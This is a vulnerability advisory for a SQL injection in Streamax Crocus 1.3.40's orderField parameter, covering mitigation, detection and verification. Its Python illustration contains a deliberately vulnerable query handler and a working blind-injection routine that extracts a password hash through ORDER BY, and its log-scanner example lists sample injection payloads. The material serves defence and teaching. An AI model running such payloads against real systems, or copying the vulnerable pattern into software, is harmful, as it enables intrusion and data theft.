CVE-2025-11909

6.3 MEDIUM

📋 TL;DR

This CVE describes a SQL injection vulnerability in Shenzhen Ruiming Technology's Streamax Crocus system version 1.3.40. Attackers can manipulate the 'orderField' parameter in the /RepairRecord.do?Action=QueryLast endpoint to execute arbitrary SQL commands. Organizations using this specific version of the Streamax Crocus system are affected.

💻 Affected Systems

Products:
  • Shenzhen Ruiming Technology Streamax Crocus
Versions: 1.3.40
Operating Systems: Unknown
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default configuration of version 1.3.40.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete database compromise, including data theft, data manipulation and, depending on the database engine and the privileges of the application's database account, remote code execution through database functions.

🟠 Likely Case: Unauthorized data access and exfiltration from the application database, with possible privilege escalation inside the database.

🟢 If Mitigated: Limited impact when the orderField value is validated against an allowlist and the application's database account holds only the permissions it needs, confining any damage to non-critical data.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit details are publicly available on GitHub, making this easily exploitable by attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Contact Shenzhen Ruiming Technology for updated version information.

🔧 Temporary Workarounds

Input Validation Filter (applies to: all)

Validate the orderField parameter against an allowlist of the column names the endpoint is expected to sort by, and reject anything else. Note that prepared statements alone do not cover this case: ORDER BY takes an identifier, not a bound value, so the allowlist is the actual control.

Web Application Firewall (applies to: all)

Deploy a WAF with SQL injection rules in front of the application to block obviously malicious requests. Treat this as a stopgap: keyword-based rules miss ORDER BY payloads built from expressions (CASE ... WHEN ..., nested subqueries) and can be bypassed by encoding.
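The following is an added illustration, not Streamax Crocus code and not a description of its internals: a minimal "query last record" handler in Python over an in-memory SQLite database, with the sort column concatenated into the query the way the advisory describes, next to an allowlisted version. The table, column names and the admin hash are constructed for the example. It also shows why a sort-column injection matters even though nothing is printed back: a CASE expression in ORDER BY turns the returned row into a one-bit oracle, and the example reads the admin hash prefix with it.

```python
import sqlite3

# Constructed stand-in schema and data (not the product's schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE repair_record (id INTEGER PRIMARY KEY, vehicle TEXT, repaired_at TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT);
        INSERT INTO repair_record VALUES
            (1, 'BUS-09', '2025-01-01'),
            (2, 'BUS-02', '2025-01-03'),
            (3, 'BUS-03', '2025-01-02');
        INSERT INTO users VALUES (1, 'admin', '$2b$12$constructedexamplehash');
    """)
    return conn


def query_last_vulnerable(conn: sqlite3.Connection, order_field: str) -> tuple:
    """The bug class: the sort column is pasted into the SQL text.

    A bind parameter cannot be used here, because ORDER BY takes an identifier
    or expression rather than a value; that is why this pattern keeps recurring.
    """
    sql = f"SELECT id, vehicle, repaired_at FROM repair_record ORDER BY {order_field} DESC LIMIT 1"
    return conn.execute(sql).fetchone()


def hash_char_probe(position: int, guess: str) -> str:
    """Boolean-based orderField payload (hypothetical, for the example schema).

    If the guessed character is right the query sorts by id, otherwise by
    vehicle, so which row comes back leaks one bit about the users table.
    """
    guess = guess.replace("'", "''")
    return (
        "(CASE WHEN (SELECT substr(password_hash, {p}, 1) FROM users WHERE name = 'admin') = '{g}' "
        "THEN id ELSE vehicle END)"
    ).format(p=position, g=guess)


def leak_hash_prefix(conn: sqlite3.Connection, length: int, alphabet: str) -> str:
    """Recover the first `length` characters of the admin hash, one probe per candidate."""
    baseline = query_last_vulnerable(conn, "id")  # the row seen when the condition is true
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if query_last_vulnerable(conn, hash_char_probe(pos, ch)) == baseline:
                recovered += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return recovered


# Hardened form: the only safe way to let the client choose a sort column is an
# allowlist of identifiers; once validated, interpolating the name is fine.
ALLOWED_ORDER_FIELDS = {"id", "vehicle", "repaired_at"}


def query_last_hardened(conn: sqlite3.Connection, order_field: str) -> tuple:
    if order_field not in ALLOWED_ORDER_FIELDS:
        raise ValueError(f"unexpected orderField: {order_field!r}")
    sql = f"SELECT id, vehicle, repaired_at FROM repair_record ORDER BY {order_field} DESC LIMIT 1"
    return conn.execute(sql).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(query_last_vulnerable(db, "repaired_at"))  # legitimate use
    print(leak_hash_prefix(db, 4, "$0123456789abcdefghijklmnopqrstuvwxyz"))
    try:
        query_last_hardened(db, hash_char_probe(1, "$"))
    except ValueError as err:
        print("rejected:", err)
```

The probe never needs an error message or a UNION in the response, which is why a WAF rule keyed on UNION/SELECT in the query string is not a substitute for the allowlist: the same oracle can be built with a subquery-free comparison against data the endpoint already returns.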

🧯 If You Can't Patch

  • Isolate the system from internet access and restrict network access to trusted IPs only
  • Run the application against a database account with the minimum privileges it needs (no DDL, no access to unrelated tables, no file or command functions) so that a successful injection is contained
  • Implement database monitoring and alerting for suspicious SQL queries

🔍 How to Verify

Check if Vulnerable:

Confirm the system is running Streamax Crocus version 1.3.40. Then, only with authorization, request /RepairRecord.do?Action=QueryLast with an orderField value that is not a plain column name (for example a parenthesized expression). If the response sort order changes, or a database error comes back instead of a rejection, the parameter reaches the SQL text unfiltered.

Check Version:

Check system documentation or web interface for version information

Verify Fix Applied:

Repeat the same probes against the vulnerable endpoint. A fixed system rejects (or ignores) any orderField value outside the expected set of column names and returns no database errors.

📡 Detection & Monitoring

Log Indicators:

  • Unusual SQL queries in database logs
  • Multiple failed login attempts following SQL injection patterns
  • Requests to /RepairRecord.do with suspicious orderField parameters

Network Indicators:

  • HTTP requests containing SQL keywords in orderField parameter
  • Unusual database traffic patterns

SIEM Query:

web.url:*RepairRecord.do* AND (web.param.orderField:*SELECT* OR web.param.orderField:*UNION* OR web.param.orderField:*OR*)

Caveat: these are substring wildcards. *OR* also matches legitimate identifiers such as repairOrder and *SELECT* matches selectedDate, so the rule is noisy and misses expression-based payloads. A tighter rule URL-decodes the value first and alerts on anything that is not a bare identifier (spaces, parentheses, quotes, commas, comment sequences), using keywords only as secondary evidence.
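As an added example, not part of the original advisory, the same detection logic written out in Python and run over a few constructed Apache-style access log lines: extract orderField from requests to /RepairRecord.do, URL-decode it once, and classify it as a bare identifier, an expression with SQL tokens, or otherwise suspicious. It also evaluates the substring match the SIEM query above performs, so the false positive on repairOrder is visible side by side. The log lines, IPs and field names are made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The quoted request part of a combined-format access log line.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A sort column is a bare identifier, optionally table-qualified. Nothing else.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$")

# Tokens that have no business in a column name once the value is decoded.
SQL_TOKENS = re.compile(r"(?i)\b(select|union|case|when|sleep|benchmark|and|or)\b|[()'\";#]|--|/\*")


def order_field_of(target: str):
    """Return the decoded orderField value for a /RepairRecord.do request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/RepairRecord.do"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("orderField")
    return values[0] if values else None


def classify(value: str) -> str:
    if IDENTIFIER.match(value):
        return "ok"
    if SQL_TOKENS.search(value):
        return "sqli"
    return "suspicious"  # not an identifier, no known token: still worth a look


def naive_wildcard_hit(value: str) -> bool:
    """What `orderField:*SELECT* OR *UNION* OR *OR*` effectively tests."""
    upper = value.upper()
    return "SELECT" in upper or "UNION" in upper or "OR" in upper


def scan(log_text: str):
    """Yield (client_ip, decoded orderField, verdict, naive_rule_hit) per matching request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        value = order_field_of(match.group("target"))
        if value is None:
            continue
        client_ip = line.split()[0]
        findings.append((client_ip, value, classify(value), naive_wildcard_hit(value)))
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2025:10:01:02 +0000] "GET /RepairRecord.do?Action=QueryLast&orderField=repairTime HTTP/1.1" 200 512
10.0.0.5 - - [12/Oct/2025:10:01:09 +0000] "GET /RepairRecord.do?Action=QueryLast&orderField=repairOrder HTTP/1.1" 200 498
203.0.113.7 - - [12/Oct/2025:10:02:41 +0000] "GET /RepairRecord.do?Action=QueryLast&orderField=(CASE+WHEN+(SELECT+1)=1+THEN+id+ELSE+name+END) HTTP/1.1" 200 512
203.0.113.7 - - [12/Oct/2025:10:02:45 +0000] "GET /RepairRecord.do?Action=QueryLast&orderField=id%2C%28select%20sleep%285%29%29 HTTP/1.1" 200 530
203.0.113.7 - - [12/Oct/2025:10:03:01 +0000] "GET /Login.do?user=admin HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for client_ip, value, verdict, naive in scan(SAMPLE_LOG):
        print(f"{client_ip:<12} {verdict:<10} naive_rule={naive!s:<5} {value}")
```

The second line shows the cost of the wildcard rule: repairOrder trips `*OR*` while the identifier check passes it, and the two injection attempts are caught by the identifier check regardless of which keywords they use. Values that arrive double-encoded (%2528 for a parenthesis) need a second decoding pass before classification; this example decodes once.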

🔗 References
